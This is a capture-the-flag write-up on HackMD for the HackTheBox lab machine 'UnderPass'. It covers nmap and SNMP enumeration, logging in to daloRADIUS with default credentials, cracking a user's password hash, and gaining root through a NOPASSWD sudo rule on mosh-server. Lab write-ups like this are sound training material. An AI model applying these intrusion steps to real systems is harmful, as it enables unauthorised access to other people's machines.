Try   HackMD

UnderPass Hackthebox Writeup

An easy box from HTB, we first get access to daloradius with weak credentials using them to expose a potential user with his hashed (weak) password, I crack the password ending up getting the plaintext password and we use the password to login to the host via SSH! Easy Win! Lastly we escalate our privileges by taking advantage of Mosh (Mobile Shell). πŸš€

Enumeration

I start off with my nmap-scan:

➜ nmap -sS -sV -sC 10.10.11.48 -oN nmap-scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 01:32 EAT
Nmap scan report for 10.10.11.48
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds

We find that there are 2 ports, running a directory search won't reveal anything juicy, thus I proceed to run UDP scan with nmap:

➜ nmap -sU -sV --top-ports=10 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 01:42 EAT
Nmap scan report for 10.10.11.48
Host is up (0.14s latency).

PORT     STATE  SERVICE      VERSION
53/udp   closed domain
67/udp   closed dhcps
123/udp  closed ntp
135/udp  closed msrpc
137/udp  closed netbios-ns
138/udp  closed netbios-dgm
161/udp  open   snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
445/udp  closed microsoft-ds
631/udp  closed ipp
1434/udp closed ms-sql-m
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.73 seconds

We can see that port 161 running SNMP is open and checking the Service Info it reveals the host's name and some other information.

SNMP Enumeration

You can learn more on SNMP Pentesting from here.

I use snmpbulkwalk to enumerate for to access the data from available OIDs:

snmpbulkwalk -c public -v2c 10.10.11.48 .

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

We get two interesting things from the output:

  1. steve@underpass.htb
  2. Hex String (07E90509163303002B0000)
  3. "UnDerPass.htb is the only daloradius server in the basin!"

This is the second time daloradius shows up, searching it up on the browser you should find that it's a Web Management Application:

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Trying to access it from port 80, brought forbidden!

Initial Foothold

Reviewing the github repository we can easily identify the login path, and there is an issue displaying the default credentials that are expected to be used to login.

Thus I proceed to access the operator's login page and use the credentials administrator:radius:

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Listing the users available we get a user named svcMosh with a hashed password:

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Using either john, hashcat, or crackstation whichever tool of your choice, you can easily crack the hash and get the plaintext password as : underwaterfriends

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Using the credentials svcMosh:underwaterfriends we are able to login via SSH:

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Privilege Escalation

The user is found to have sudo priviles on the binary /usr/bin/mosh-server:

svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

So basically mosh is a remote terminal tool, "a replacement for interactive SSH terminals". You can easily review the documentation to learn how it works and how you can connect back to the mosh-server after starting it!

We first install mosh on our host with the commands below:

sudo apt-get install mosh

We then proceed to run mosh server on port 61337 with the commands sudo mosh-server new -p 61337 and then on our host we proceed to connect back to it with the command MOSH_KEY={VALUE_OF_KEY} mosh-client 10.10.11.48 61337, and we will be able to get an interactive shell session as root!

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

πŸ“¨ Got a feedback? contact me πŸ“¨
β˜• Like this content? Consider buying me a coffee β˜•

Last changed by 
 
Tahaa Farooq
γŠε‰γ―γ‚‚γ†ζ­»γ‚“γ§γ„γ‚‹
0
1
146

Read more

Secret Writeup Hackthebox

So found 3 open ports , 22(SSH), 80(HTTP) , 3000(HTTP) with Node.js , Opening port 80 it had a landing page which was titled Dump Docs , and both were also there on port 3000 with a file named files.zip attached which contains the source code of how the api works

Apr 27, 2025
DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

With default credential for the guest user β€œguest:guest” to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users.

Feb 20, 2025
File Transfer Tricks

As a penetration tester, you have happened to gain access to a few target hosts (windows & linux) within the scope of your engagement and you are now required to transfer some files from your host to the target's host and vise versa, what do you do?

Jan 13, 2025
Introduction To CryptoHack - Writeup

This starter course gets you up and running with CryptoHack. You'll learn to encode and decode data types that are commonly used in cryptography. Then you'll get comfortable with the XOR operation which is at the centre of symmetric cryptography. Finally, the course ends with some fun XOR puzzles to test what you've learned.

Nov 7, 2024
Read more from Tahaa Farooq
Published on HackMD